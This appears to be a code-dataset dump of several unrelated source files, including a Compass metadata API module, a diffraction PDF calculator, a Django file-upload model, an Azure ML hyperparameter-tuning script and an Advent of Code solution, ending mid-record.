1]])\n \nC_case3 = np.array([\n [1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1]])\n\nC_case4 = np.eye(2*dof) \n\nC = C_case1\n \n\nControllerCost = {'Q': 100*np.eye(4), 'R': 1}\nObserverCost = {'Q': 100*np.eye(4), 'R': np.array([[C.shape[0]]])}\nsystem = LTI_System(A, B, C, G, g,ControllerCost, ObserverCost,\n 0.01*np.array([0,0,np.random.randn(),np.random.randn(), 0,0,0,0]), \n 0.01*np.array([0,0,np.random.randn(),np.random.randn(), 0,0,0,0]),\n tol)\n\nOutput = LTI_CLQE(system)\n\n'''\n\nTime = 15\n[TOUT,YOUT] = ode45(Output.closed_loop.z_xi.ode_fnc, [0 Time], Output.closed_loop.z_xi.Y0)\n\nz = YOUT(:, 1:Output.sizes.size_z)\nz_est = YOUT(:, (1+Output.sizes.size_z):(2*Output.sizes.size_z))\nzeta_est = YOUT(:, (1+2*Output.sizes.size_z):(2*Output.sizes.size_z+Output.sizes.size_zeta) )\nx_est = (Output.Matrices.N *z_est' + Output.Matrices.R_used*zeta_est')'\n\nfigure('Color', 'w')\nsubplot(2, 2, 1)\nplot(TOUT, z, 'LineWidth', 1.5) hold on title('z')\nplot([TOUT(1) TOUT(end)], [Output.desired.z_corrected' Output.desired.z_corrected'], '--', 'LineWidth', 0.8)\n\nsubplot(2, 2, 2)\nplot(TOUT, z_est) title('z est')\nsubplot(2, 2, 3)\nif ~isempty(zeta_est)\n plot(TOUT,zeta_est) title('zeta est')\nend\n\nsubplot(2, 2, 4)\n\nplot(TOUT, x_est, 'LineWidth', 1.5) hold on title('x est')\nplot([TOUT(1) TOUT(end)], [Output.desired.x_corrected' Output.desired.x_corrected'], '--', 'LineWidth', 0.8)\n\n\ndrawnow\n##################################################################\n\n[TOUT,YOUT] = ode45(Output.closed_loop.x_xi.ode_fnc, [0 Time], Output.closed_loop.x_xi.Y0)\n\nx = YOUT(:, 1:Output.sizes.size_x)\nz_est = YOUT(:, (1+Output.sizes.size_x):(Output.sizes.size_x+Output.sizes.size_z))\nzeta_est = YOUT(:, (1+Output.sizes.size_x+Output.sizes.size_z):(Output.sizes.size_x+Output.sizes.size_z+Output.sizes.size_zeta) )\nz_calc = (Output.Matrices.N'*x')'\n\nfigure('Color', 'w')\nsubplot(3, 2, 1)\nplot(TOUT, x, 'LineWidth', 1.5) hold on title('x')\nplot([TOUT(1) TOUT(end)], [Output.desired.x_corrected' Output.desired.x_corrected'], '--', 'LineWidth', 0.8)\n\nsubplot(3, 2, 2)\nplot(TOUT, z_est) title('z est')\nsubplot(3, 2, 3)\n\nif ~isempty(zeta_est)\n plot(TOUT, zeta_est) title('zeta est')\nend\n\nsubplot(3, 2, 4)\nplot(TOUT, z_calc) hold on title('z calc')\nplot([TOUT(1) TOUT(end)], [Output.desired.z_corrected' Output.desired.z_corrected'], '--', 'LineWidth', 0.8)\nsubplot(3, 2, 5)\nplot(TOUT, z-z_calc) title('z-z calc')\n\ndrawnow\n\n'''","sub_path":"examples/MassWheel/test_LTI_CLQE.py","file_name":"test_LTI_CLQE.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"404575896","text":"# Copyright 2014 Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Metadata related object holder.\"\"\"\nimport logging\n\nfrom compass.db.api import database\nfrom compass.db.api import metadata as metadata_api\nfrom compass.db.api import permission\nfrom compass.db.api import user as user_api\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\nfrom compass.utils import setting_wrapper as setting\nfrom compass.utils import util\n\n\nRESP_METADATA_FIELDS = [\n 'os_config', 'package_config', 'flavor_config'\n]\nRESP_FLAVORS_FIELDS = [\n 'id', 'name', 'display_name', 'template', 'roles'\n]\n\n\n@database.run_in_session()\ndef load_metadatas(session):\n load_os_metadatas_internal(session)\n load_package_metadatas_internal(session)\n load_flavor_metadatas_internal(session)\n\n\ndef load_os_metadatas_internal(session):\n global OS_METADATA_MAPPING\n logging.info('load os metadatas into memory')\n OS_METADATA_MAPPING = metadata_api.get_os_metadatas_internal(session)\n\n\ndef load_package_metadatas_internal(session):\n global PACKAGE_METADATA_MAPPING\n logging.info('load package metadatas into memory')\n PACKAGE_METADATA_MAPPING = (\n metadata_api.get_package_metadatas_internal(session)\n )\n\n\ndef load_flavor_metadatas_internal(session):\n global FLAVOR_METADATA_MAPPING\n logging.info('load flavor metadatas into memory')\n FLAVOR_METADATA_MAPPING = (\n metadata_api.get_flavor_metadatas_internal(session)\n )\n\n\nOS_METADATA_MAPPING = {}\nPACKAGE_METADATA_MAPPING = {}\nFLAVOR_METADATA_MAPPING = {}\n\n\ndef _validate_config(\n config, id, id_name, metadata_mapping, whole_check, **kwargs\n):\n if id not in metadata_mapping:\n raise exception.InvalidParameter(\n '%s id %s is not found in metadata mapping' % (id_name, id)\n )\n metadatas = metadata_mapping[id]\n metadata_api.validate_config_internal(\n config, metadatas, whole_check, **kwargs\n )\n\n\ndef validate_os_config(\n session, config, os_id, whole_check=False, **kwargs\n):\n if not OS_METADATA_MAPPING:\n load_os_metadatas_internal(session)\n _validate_config(\n config, os_id, 'os', OS_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef validate_package_config(\n session, config, adapter_id, whole_check=False, **kwargs\n):\n if not PACKAGE_METADATA_MAPPING:\n load_package_metadatas_internal(session)\n _validate_config(\n config, adapter_id, 'adapter', PACKAGE_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef validate_flavor_config(\n session, config, flavor_id, whole_check=False, **kwargs\n):\n if not FLAVOR_METADATA_MAPPING:\n load_flavor_metadatas_internal(session)\n _validate_config(\n config, flavor_id, 'flavor', FLAVOR_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef _filter_metadata(metadata, **kwargs):\n if not isinstance(metadata, dict):\n return metadata\n filtered_metadata = {}\n for key, value in metadata.items():\n if key == '_self':\n filtered_metadata[key] = {\n 'name': value['name'],\n 'description': value.get('description', None),\n 'default_value': value.get('default_value', None),\n 'is_required': value.get('is_required', False),\n 'required_in_whole_config': value.get(\n 'required_in_whole_config', False),\n 'js_validator': value.get('js_validator', None),\n 'options': value.get('options', None),\n 'required_in_options': value.get(\n 'required_in_options', False),\n 'field_type': value.get(\n 'field_type_data', 'str'),\n 'display_type': value.get('display_type', None),\n 'mapping_to': value.get('mapping_to', None)\n }\n else:\n filtered_metadata[key] = _filter_metadata(value, **kwargs)\n return filtered_metadata\n\n\ndef get_package_metadata_internal(session, adapter_id):\n \"\"\"get package metadata internal.\"\"\"\n if not PACKAGE_METADATA_MAPPING:\n load_package_metadatas_internal(session)\n if adapter_id not in PACKAGE_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'adpater %s does not exist' % adapter_id\n )\n return _filter_metadata(\n PACKAGE_METADATA_MAPPING[adapter_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_package_metadata(adapter_id, user=None, session=None, **kwargs):\n return {\n 'package_config': get_package_metadata_internal(session, adapter_id)\n }\n\n\ndef get_flavor_metadata_internal(session, flavor_id):\n \"\"\"get flavor metadata internal.\"\"\"\n if not FLAVOR_METADATA_MAPPING:\n load_flavor_metadatas_internal(session)\n if flavor_id not in FLAVOR_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'flavor %s does not exist' % flavor_id\n )\n return _filter_metadata(\n FLAVOR_METADATA_MAPPING[flavor_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_flavor_metadata(flavor_id, user=None, session=None, **kwargs):\n return {\n 'flavor_config': get_flavor_metadata_internal(session, flavor_id)\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_FLAVORS_FIELDS)\ndef list_flavors(user=None, session=None, **filters):\n \"\"\"List flavors.\"\"\"\n return utils.list_db_objects(\n session, models.AdapterFlavor, **filters\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_FLAVORS_FIELDS)\ndef get_flavor(flavor_id, user=None, session=None, **kwargs):\n \"\"\"Get flavor.\"\"\"\n return utils.get_db_object(\n session, models.AdapterFlavor, id=flavor_id\n )\n\n\ndef get_os_metadata_internal(session, os_id):\n \"\"\"get os metadata internal.\"\"\"\n if not OS_METADATA_MAPPING:\n load_os_metadatas_internal(session)\n if os_id not in OS_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'os %s does not exist' % os_id\n )\n return _filter_metadata(\n OS_METADATA_MAPPING[os_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_os_metadata(os_id, user=None, session=None, **kwargs):\n \"\"\"get os metadatas.\"\"\"\n return {'os_config': get_os_metadata_internal(session, os_id)}\n\n\ndef get_ui_metadata(metadata, config):\n \"\"\"convert os_metadata to ui os_metadata.\"\"\"\n result_config = {}\n result_config[config['mapped_name']] = []\n for mapped_child in config['mapped_children']:\n data_dict = {}\n for config_key, config_value in mapped_child.items():\n for key, value in config_value.items():\n if 'data' == key:\n result_data = []\n _get_data(metadata[config_key], value, result_data)\n data_dict['data'] = result_data\n else:\n data_dict[key] = value\n result_config[config['mapped_name']].append(data_dict)\n return result_config\n\n\ndef _get_data(metadata, config, result_data):\n data_dict = {}\n for key, config_value in config.items():\n if isinstance(config_value, dict) and key != 'content_data':\n if key in metadata.keys():\n _get_data(metadata[key], config_value, result_data)\n else:\n _get_data(metadata, config_value, result_data)\n elif isinstance(config_value, list):\n option_list = []\n for item in config_value:\n if isinstance(item, dict):\n option_list.append(item)\n data_dict[key] = option_list\n else:\n if isinstance(metadata['_self'][item], bool):\n data_dict[item] = str(metadata['_self'][item]).lower()\n else:\n data_dict[item] = metadata['_self'][item]\n else:\n data_dict[key] = config_value\n if data_dict:\n result_data.append(data_dict)\n return result_data\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_package_os_metadata(\n adapter_id, os_id,\n user=None, session=None, **kwargs\n):\n from compass.db.api import adapter_holder as adapter_api\n adapter = adapter_api.get_adapter_internal(session, adapter_id)\n os_ids = [os['os_id'] for os in adapter['supported_oses']]\n if os_id not in os_ids:\n raise exception.InvalidParameter(\n 'os %s is not in the supported os list of adapter %s' % (\n os_id, adapter_id\n )\n )\n metadatas = {}\n metadatas['os_config'] = get_os_metadata_internal(\n session, os_id\n )\n metadatas['package_config'] = get_package_metadata_internal(\n session, adapter_id\n )\n return metadatas\n\n\ndef _autofill_config(\n config, id, id_name, metadata_mapping, **kwargs\n):\n if id not in metadata_mapping:\n raise exception.InvalidParameter(\n '%s id %s is not found in metadata mapping' % (id_name, id)\n )\n metadatas = metadata_mapping[id]\n logging.debug(\n 'auto fill %s config %s by params %s',\n id_name, config, kwargs\n )\n return metadata_api.autofill_config_internal(\n config, metadatas, **kwargs\n )\n\n\ndef autofill_os_config(\n session, config, os_id, **kwargs\n):\n if not OS_METADATA_MAPPING:\n load_os_metadatas_internal(session)\n return _autofill_config(\n config, os_id, 'os', OS_METADATA_MAPPING, session=session, **kwargs\n )\n\n\ndef autofill_package_config(\n session, config, adapter_id, **kwargs\n):\n if not PACKAGE_METADATA_MAPPING:\n load_package_metadatas_internal(session)\n return _autofill_config(\n config, adapter_id, 'adapter', PACKAGE_METADATA_MAPPING,\n session=session, **kwargs\n )\n","sub_path":"compass/db/api/metadata_holder.py","file_name":"metadata_holder.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"537185135","text":"import numpy as np\nimport definitions\n\nparamK = np.loadtxt(definitions.KIRKLAND_PATH)\nparamL = np.loadtxt(definitions.LOBATO_PATH)\n\n\ndef calculation(ds, px_start_num, px_end_num, element_nums, ratio, azavg, is_full_q, damping, rmax, dr, electron_voltage, fit_at_q=None, N=None, scattering_factor_type=\"Kirkland\", fitting_range=None):\n assert len(element_nums) == len(ratio)\n if px_start_num is None or px_start_num==0:\n px_start_num = 1\n if px_end_num is None or px_end_num==0:\n px_end_num = len(azavg)\n\n element_nums = np.array(element_nums)\n for idx, element in enumerate(element_nums):\n if element == 0:\n ratio[idx] = 0\n element_nums = element_nums[element_nums != 0]\n ratio = np.array(ratio)\n ratio = ratio[ratio != 0]\n e_tot = np.sum(np.array(ratio))\n e_ratio = ratio / e_tot\n\n x = np.arange(px_start_num, px_end_num + 1) # selected x ranges, end point = end point(eRDF) + 1\n # Iq = azavg[px_start_num-1:px_end_num] # Indexing number\n Iq = azavg[px_start_num: px_end_num + 1]\n\n q = x * ds * 2 * np.pi\n\n s = q / 2 / np.pi\n s2 = s ** 2\n\n if scattering_factor_type == \"Kirkland\":\n paramK_elems = paramK[element_nums, :]\n f = np.array([KirklandFactors(s2, paramK_elem) for paramK_elem in paramK_elems])\n elif scattering_factor_type == \"Lobato\":\n paramL_elems = paramL[element_nums, :]\n f = np.array([LobatoFactors(s2, paramL_elem) for paramL_elem in paramL_elems])\n f = f * calculate_relativistic(electron_voltage)\n\n fq = np.sum(f * e_ratio[:, None], axis=0)\n fq_sq = fq ** 2\n gq = np.sum(f ** 2 * e_ratio[:, None], axis=0)\n\n L = np.uint16(len(q))\n # if is_full_q:\n # AFrange = 0\n # else:\n # AFrange = int(2 / 3 * L)\n\n wi = np.ones((L))\n if fitting_range is not None:\n # wi = np.ones((L, 1))\n wi = np.zeros((L))\n # wi[0:AFrange] = 0\n q_to_x_factor = 1 / (ds * 2 * np.pi)\n l = np.int(np.round(q_to_x_factor * fitting_range[0]))\n r = np.int(np.round(q_to_x_factor * fitting_range[1]))\n wi[l:r] = 1\n\n # added code\n if fit_at_q is not None:\n search_q = q[q <= fit_at_q + (ds/2)*(2*np.pi)]\n else:\n search_q = q\n fit_at_q, qpos = search_q.max(), search_q.argmax() # qmax = q_fix\n # end\n\n # qmax, qpos = q.max(), q.argmax() # qmax = q_fix\n fqfit = gq[qpos]\n iqfit = Iq[qpos]\n\n if N is None:\n a1 = np.sum(wi * gq * Iq)\n a2 = np.sum(wi * Iq * fqfit)\n a3 = np.sum(wi * gq * iqfit)\n a4 = np.sum(wi) * fqfit * iqfit\n a5 = np.sum(wi * gq ** 2)\n a6 = 2 * np.sum(wi * gq * fqfit)\n a7 = np.sum(wi) * fqfit * fqfit\n N = (a1 - a2 - a3 + a4) / (a5 - a6 + a7)\n\n C = iqfit - N * fqfit\n\n Autofit = N * gq + C\n\n SS = np.sum((Iq - Autofit) ** 2);\n\n r = np.arange(0.01, rmax + dr, dr) # rmax+dr to fit the eRDF\n\n phiq = ((Iq - Autofit) * s) / (N * fq_sq);\n phiq_damp = phiq * np.exp(-s2 * damping)\n\n Gr = 8 * np.pi * phiq_damp @ np.sin(q[:, None] * r) * ds\n\n return q, r, Iq, Autofit, phiq, phiq_damp, Gr, SS, fit_at_q, N\n\n\ndef calculate_relativistic(voltage):\n if voltage == '':\n voltage = 0.0\n voltage = float(voltage)\n c = 2.998e8\n relvelocity = c * (1 - 1 / (1 + voltage/511)**2 ) ** 0.5\n mass_e_relative = 1 / (1-(relvelocity**2/c**2)) ** 0.5\n return mass_e_relative\n\ndef rescaling_Iq(q_start_num, q_end_num, azavg, ds):\n x = np.arange(q_start_num, q_end_num + 1) # selected x ranges, end point = end point(eRDF) + 1\n Iq = azavg[q_start_num - 1:q_end_num]\n\n q = x * ds * 2 * np.pi\n return q, Iq\n\ndef pixel_to_q(args, ds):\n return np.array(args) * ds * 2 * np.pi\n\ndef q_to_pixel(args, ds):\n return np.round(np.array(args) / ds / 2 / np.pi).astype(int)\n\ndef _calculation_with_q(ds, q, Iq, element_nums, ratio, is_full_q, damping, rmax, dr, fit_at_q=None, N=None):\n element_nums = np.array(element_nums)\n for idx, element in enumerate(element_nums):\n if element == 0:\n ratio[idx] = 0\n element_nums = element_nums[element_nums != 0]\n ratio = np.array(ratio)\n ratio = ratio[ratio != 0]\n e_tot = np.sum(np.array(ratio))\n e_ratio = ratio / e_tot\n\n s = q / 2 / np.pi\n s2 = s ** 2\n L = np.uint16(len(q))\n paramK_elems = paramK[element_nums, :]\n f = np.array([KirklandFactors(s2, paramK_elem) for paramK_elem in paramK_elems])\n fq = np.sum(f * e_ratio[:, None], axis=0) # fq.shape = 2366,\n fq_sq = fq ** 2\n gq = np.sum(f ** 2 * e_ratio[:, None], axis=0)\n\n if is_full_q:\n AFrange = 0\n else:\n AFrange = int(2 / 3 * L)\n\n wi = np.ones((L, 1))\n wi[0:AFrange] = 0\n\n # added code\n if fit_at_q is not None:\n search_q = q[q <= fit_at_q + ds/2]\n else:\n search_q = q\n fit_at_q, qpos = search_q.max(), search_q.argmax() # qmax = q_fix\n # end\n\n # qmax, qpos = q.max(), q.argmax() # qmax = q_fix\n fqfit = gq[qpos]\n iqfit = Iq[qpos]\n\n if N is None:\n a1 = np.sum(wi * gq * Iq)\n a2 = np.sum(wi * Iq * fqfit)\n a3 = np.sum(wi * gq * iqfit)\n a4 = np.sum(wi) * fqfit * iqfit\n a5 = np.sum(wi * gq ** 2)\n a6 = 2 * np.sum(wi * gq * fqfit)\n a7 = np.sum(wi) * fqfit * fqfit\n N = (a1 - a2 - a3 + a4) / (a5 - a6 + a7)\n\n C = iqfit - N * fqfit\n\n Autofit = N * gq + C\n\n SS = np.sum((Iq - Autofit) ** 2);\n\n r = np.arange(0.01, rmax + dr, dr) # rmax+dr to fit the eRDF\n\n phiq = ((Iq - Autofit) * s) / (N * fq_sq);\n phiq_damp = phiq * np.exp(-s2 * damping)\n\n Gr = 8 * np.pi * phiq_damp @ np.sin(q[:, None] * r) * ds\n\n return q, r, Iq, Autofit, phiq, phiq_damp, Gr, SS, fit_at_q, N\n\ndef LobatoFactors(s2, paramL_element):\n A1, A2, A3, A4, A5, B1, B2, B3, B4, B5 = paramL_element\n f = (A1 * (s2 * B1 + 2))/((s2 * B1 + 1)**2) + (A2 * (s2 * B2 + 2))/((s2 * B2 + 1)**2) + \\\n (A3 * (s2 * B3 + 2))/((s2 * B3 + 1)**2) + (A4 * (s2 * B4 + 2))/((s2 * B4 + 1)**2) + \\\n (A5 * (s2 * B5 + 2))/((s2 * B5 + 1)**2)\n return np.array(f)\n\ndef KirklandFactors(s2, paramK_element):\n a1, b1, a2, b2, a3, b3, c1, d1, c2, d2, c3, d3 = paramK_element\n f = (a1 / (s2 + b1)) + (a2 / (s2 + b2)) + (a3 / (s2 + b3)) + (np.exp(-s2 * d1) * c1) + (np.exp(-s2 * d2) * c2) + (\n np.exp(-s2 * d3) * c3)\n # f1 = ((s2+b1_1).\\a1_1)+((s2+b2_1).\\a2_1)+((s2+b3_1).\\a3_1)+(exp(-s2.*d1_1).*c1_1)+(exp(-s2.*d2_1).*c2_1)+(exp(-s2.*d3_1).*c3_1);\n return np.array(f)","sub_path":"calculate/pdf_calculator.py","file_name":"pdf_calculator.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"373570943","text":"##getting tree\r\n\r\nimport os\r\ndef get_tree(path):\r\n f=open(\"tree.txt\",'w+')\r\n data=os.popen(\"tree \"+path).read()\r\n print(data)\r\n f.write(data)\r\n f.close()\r\npath=input(\"path:\")\r\nget_tree(path)\r\nw=input(\"Press any key to continue\")\r\n","sub_path":"get_tree.py","file_name":"get_tree.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314780044","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport uuid\nfrom datetime import timedelta\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.core.files import File\nfrom django.core.urlresolvers import get_callable\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom positions.fields import PositionField\n\nfrom .conf import settings\nfrom .managers import AttachmentManager\n\n\ndef upload_path(instance, filename):\n FILENAME_FUNCTION = getattr(\n settings, 'FINEUPLOADER_FILENAME_FUNCTION', None)\n\n func = FILENAME_FUNCTION\n if func is None:\n func = lambda x: x\n\n if isinstance(func, str):\n func = get_callable(func)\n\n return os.path.join(\n 'attachments',\n instance.content_object._meta.app_label,\n instance.content_object._meta.object_name.lower(),\n str(instance.content_object.pk),\n func(filename),\n )\n\n\n@python_2_unicode_compatible\nclass Attachment(models.Model):\n\n content_type = models.ForeignKey('contenttypes.ContentType', on_delete=models.CASCADE)\n object_id = models.CharField(max_length=128)\n content_object = GenericForeignKey('content_type', 'object_id')\n\n field_name = models.CharField(max_length=256, null=True, blank=True)\n\n file_obj = models.FileField(_(\"file\"), upload_to=upload_path)\n original_filename = models.CharField(_(\"original filename\"), max_length=255, blank=True, null=True)\n\n # for internal use...\n\n owner = models.ForeignKey(\n getattr(settings, 'AUTH_USER_MODEL', 'auth.User'),\n related_name='owned_%(class)ss', on_delete=models.SET_NULL,\n null=True, blank=True, verbose_name=_('owner'),\n )\n\n uuid = models.UUIDField()\n\n position = PositionField(_(\"order\"), default=-1, collection=('object_id', 'content_type'))\n\n timestamp = models.DateTimeField(default=timezone.now)\n\n objects = AttachmentManager()\n\n class Meta:\n verbose_name = _('attachment')\n verbose_name_plural = _('attachments')\n unique_together = ['content_type', 'object_id', 'uuid']\n ordering = ['-timestamp', 'position']\n\n def __str__(self):\n if self.original_filename:\n return self.original_filename\n return str(self.file_obj.name)\n\n def get_absolute_url(self):\n return self.file_obj.url\n\n def as_file(self):\n class AttachmentFile(File):\n uuid = str(self.uuid)\n\n return AttachmentFile(self.file_obj, self.original_filename)\n\n def delete(self, *args, **kwargs):\n if self.file_obj and self.file_obj.storage.exists(self.file_obj.name):\n self.file_obj.delete()\n\n super(Attachment, self).delete(*args, **kwargs)\n\n\n@python_2_unicode_compatible\nclass Temporary(models.Model):\n\n formid = models.CharField(max_length=128)\n\n attachments = GenericRelation(Attachment)\n\n # for internal use...\n\n timestamp = models.DateTimeField(default=timezone.now)\n\n class Meta(object):\n verbose_name = _('temporary')\n verbose_name_plural = _('temporary')\n ordering = ['-timestamp']\n\n def __str__(self):\n return self.formid\n\n @property\n def is_expired(self):\n EXPIRY_AGE = settings.FINEUPLOADER_TEMPORARY_AGE\n\n if (self.timestamp + timedelta(seconds=EXPIRY_AGE)) <= timezone.localtime(timezone.now()):\n return True\n else:\n return False\n","sub_path":"fineuploader/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162481612","text":"import os\nimport json\nimport azureml\nimport shutil\nfrom azureml.core import Workspace\nfrom azureml.core import Experiment\nfrom azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\nfrom azureml.train.hyperdrive import RandomParameterSampling, BanditPolicy, HyperDriveConfig, PrimaryMetricGoal\nfrom azureml.train.hyperdrive import choice, loguniform, normal, uniform\nfrom azureml.train.estimator import Estimator\n\n# check core SDK version number\nprint(\"Azure ML SDK Version: \", azureml.core.VERSION)\n\n# initialize workspace from config.json\nws = Workspace.from_config()\n\nprint('Workspace name: ' + ws.name, \n 'Azure region: ' + ws.location, \n 'Subscription id: ' + ws.subscription_id, \n 'Resource group: ' + ws.resource_group, sep='\\n')\n\ndata_folder = '/home/wopauli/256_ObjectCategories_preproc'\n\n# # folder for scripts that need to be uploaded to Aml compute target\n# script_folder = './scripts'\n# os.makedirs(script_folder, exist_ok=True)\n \n# folder for scripts that need to be uploaded to Aml compute target\nscript_folder = './scripts/'\ntry:\n os.makedirs(script_folder)\nexcept BaseException as e:\n print(\"Deleting:\", script_folder)\n shutil.rmtree(script_folder)\n os.makedirs(script_folder)\n\n\n# create AML experiment\nexp = Experiment(workspace=ws, name='kd')\n\n# upload data to default datastore\nds = ws.get_default_datastore()\n# ds.upload(src_dir=data_folder, target_path='256_ObjectCategories_preproc', overwrite=True, show_progress=False)\n\n# choose a name for your cluster\ncluster_name = \"gpu-compute\"\n\ntry:\n compute_target = AmlCompute(workspace=ws, name=cluster_name)\n print('Found existing compute target')\nexcept ComputeTargetException:\n print('Creating a new compute target...')\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_NC6', \n max_nodes=10)\n\n # create the cluster\n compute_target = ComputeTarget.create(ws, cluster_name, compute_config)\n\n # can poll for a minimum number of nodes and for a specific timeout. \n # if no min node count is provided it uses the scale settings for the cluster\n compute_target.wait_for_completion(show_output=True, min_node_count=None, timeout_in_minutes=20)\n\n# use get_status() to get a detailed status for the current cluster. \nprint(compute_target.get_status().serialize())\n\n\n# the training logic is in the keras_mnist.py file.\nshutil.copy('./squeezenet.py', script_folder)\nshutil.copy('./squeezenet_weights.hdf5', script_folder)\nshutil.copy('./kd_squeezenet.py', script_folder)\nshutil.copytree('./utils', os.path.join(script_folder, 'utils'))\n\nscript_params = {\n '--data-folder': ds.path('256_ObjectCategories_preproc').as_mount(),\n '--remote_execution': \"\"\n}\n\nest = Estimator(source_directory=script_folder,\n script_params=script_params,\n compute_target=compute_target,\n pip_packages=['keras==2.2.4', 'tensorflow==1.12.0', 'tensorflow-gpu==1.12.0', 'matplotlib', 'horovod', 'hickle', 'pillow==5.1.0', 'six==1.11.0', 'numpy==1.14.5'],\n entry_script='kd_squeezenet.py', \n use_gpu=True,\n node_count=1)\n\n\n\n\n# run = exp.submit(est)\n\n# print(run)\n\n# run.wait_for_completion(show_output=True)\n\nps = RandomParameterSampling(\n {\n '--learning_rate': uniform(1e-3, 2e-2),\n '--momentum': uniform(.1, .95),\n '--weight_decay': loguniform(-5, -3),\n '--temperature': uniform(1, 9),\n '--lambda_const': uniform(.1, .3),\n '--transfer_learning': choice(\"True\", \"False\")\n }\n)\n\npolicy = BanditPolicy(evaluation_interval=2, slack_factor=0.1, delay_evaluation=10)\n\nhdc = HyperDriveConfig(estimator=est, \n hyperparameter_sampling=ps, \n policy=policy, \n primary_metric_name='val_loss', \n primary_metric_goal=PrimaryMetricGoal.MINIMIZE, \n max_total_runs=100,\n max_concurrent_runs=5)\n\nhdr = exp.submit(config=hdc)\n\nhdr.wait_for_completion(show_output=True)\n\nbest_run = hdr.get_best_run_by_primary_metric()\nbest_run_metrics = best_run.get_metrics()\nprint(best_run)\n\n# Writing the run id to /aml_config/run_id.json for use by a DevOps pipeline.\nrun_id = {}\nrun_id['run_id'] = best_run.id\nrun_id['experiment_name'] = best_run.experiment.name\n\n# save run info \nos.makedirs('aml_config', exist_ok = True)\nwith open('aml_config/run_id.json', 'w') as outfile:\n json.dump(run_id, outfile)","sub_path":"kd_squeezenet_ht.py","file_name":"kd_squeezenet_ht.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615858770","text":"from collections import defaultdict\r\nimport heapq\r\nfile = open('day_10.txt', 'r')\r\ndata = file.read().splitlines()\r\n\r\nli = []\r\nheapq.heapify(li)\r\nlisti = [0]\r\ndiff = [0]*3\r\n\r\n#I could have just used sort but I am familiarising myself with DS hence i did both :)\r\nfor i in data:\r\n heapq.heappush(li, int(i))\r\n listi.append(int(i))\r\n\r\nprev_jolt = 0\r\nwhile len(li) != 0:\r\n small = heapq.heappop(li)\r\n if small - prev_jolt <= 3:\r\n diff[small - prev_jolt-1]+=1\r\n prev_jolt = small\r\n else:\r\n break\r\n\r\nprint((diff[2]+1)*diff[0]) #add 1 for the personal adapter voltage\r\n\r\npaths = defaultdict(int)\r\npaths[0] = 1\r\nlisti.sort()\r\nmax_volt = listi[len(listi)-1] + 3\r\nlisti.append(max_volt)\r\nfor adapter in listi:\r\n for diff in range(1, 4):\r\n next_adapter = adapter + diff\r\n if next_adapter in listi:\r\n paths[next_adapter] += paths[adapter]\r\n print(paths[next_adapter], next_adapter)\r\nprint(paths[max_volt])\r\n\r\n \r\n ","sub_path":"day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161308134","text":"import youtube_dl\nimport time\nfrom youtube_dl.utils import DownloadError\nfrom 